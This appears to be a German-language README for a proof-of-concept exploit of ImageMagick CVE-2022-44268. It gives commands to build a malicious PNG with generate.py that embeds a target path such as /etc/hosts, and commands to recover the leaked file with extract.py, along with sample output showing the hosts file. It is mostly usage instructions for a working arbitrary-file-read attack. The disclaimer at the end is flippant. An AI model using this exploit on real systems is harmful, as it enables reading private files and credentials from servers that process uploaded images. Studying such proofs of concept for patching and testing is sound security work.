
Erzeugt bösartige PNG-Dateien, um die ImageMagick-LFI-Schwachstelle (CVE-2022-44268) zum beliebigen Dateilesen auszunutzen, mit Extraktionsskript für den Proof-of-Concept.
ImageMagick ist eine kostenlose und quelloffene plattformübergreifende Software-Suite zum Anzeigen, Konvertieren und Bearbeiten von Raster- und Vektorbilddateien. Sie kann über 200 Bilddateiformate lesen und schreiben. ImageMagick wird unter der Apache License 2.0 vertrieben. Es ist als Befehlszeilentools sowie als C-API und eine Reihe von C++-Klassen verfügbar. Wikipedia
ImageMagick Versionen 7.1.0-40 und darunter sind anfällig für eine Local-File-Inclusion-Schwachstelle. Die Schwachstelle beruht auf der unzureichenden Validierung von Benutzereingaben. Ein Angreifer kann diese Schwachstelle ausnutzen, indem er eine manipulierte PNG-Datei an das Ziel sendet. Eine erfolgreiche Ausnutzung dieser Schwachstelle könnte es einem Angreifer ermöglichen, beliebige Dateien auf dem Zielsystem zu lesen.
Danksagung an die Forscher, die dies entdeckt haben:
Erstellen Sie ein schädliches PNG, um ImageMagick 7.1.0-40 auszunutzen:
pip install Pillow)Erstellen eines PNG mit generate.py:
python3 generate.py -i input.png -f "/etc/hosts" -o exploit.png
______ __ _____ ______
| _ \ \ / / | __ \ | ____|
| |_) \ \_/ / | |__) |__ __ _ ______| |__ _ __ ___ __ _
| _ < \ / | ___/ _ \ / _` |______| __| '__/ _ \ / _` |
| |_) | | | | | | (_) | (_| | | | | | | (_) | (_| |
|____/ |_| |_| \___/ \__, | |_| |_| \___/ \__, |
__/ | __/ |
|___/ |___/
[*] ImageMagick LFI Exploit
[*] Embedding Payload to read the target file
[*] Exploit PNG generated: exploit.png
python3 extract.py downloaded_img.png
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Haftungsausschluss: Sei ein braver Junge und benutze es nicht für böse Taten.